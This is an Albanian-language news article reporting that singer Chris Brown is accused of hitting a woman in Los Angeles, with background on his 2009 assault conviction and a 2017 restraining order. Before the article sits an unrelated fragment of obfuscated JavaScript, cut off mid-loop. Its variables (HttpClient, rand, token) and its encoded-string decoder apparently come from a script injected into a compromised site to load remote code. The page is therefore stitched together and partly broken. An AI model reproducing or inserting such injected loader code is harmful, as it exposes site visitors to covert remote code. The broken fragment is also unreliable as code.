;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Këngëtari i njohur akuzohet për sulm fizik ndaj një gruaje

By

Chris Brown është akuzuar për goditje të një gruaje pas një grindjeje në Los Angeles.

Ylli 32 vjeçar i R&B, pretendohet të ketë goditur një grua ditën e premte.

Një raport krimi ka përfunduar dhe zyra e avokatit të qytetit Los Angeles tani do të shqyrtojë nëse do të ngrejë ndonjë akuzë.

Zëdhënësi i policisë tha se këngëtari amerikan nuk ishte i pranishëm kur ata arritën në vendin e ngjarjes.

“Viktima tha se ajo dhe i dyshuari po debatonin, me ç’rast i dyshuari e goditi atë,” shtoi ai.

Përfaqësuesit e Chris Brown nuk i janë përgjigjur ende kërkesës për komente.

Artisti fitues i Grammy-t ka qenë më parë në telashe me ligjin.

Në vitin 2009 ai u arrestua për sulm ndaj të dashurës së tij të atëhershme, Rihanna, ku më vonë u deklarua fajtor për sulmin.

Në vitin 2017, një tjetër e dashura, aktorja dhe modelja, Karrueche Tran, u dha një urdhër ndalimi pesë-vjeçar kundër tij.

Artikuj të ngjashëm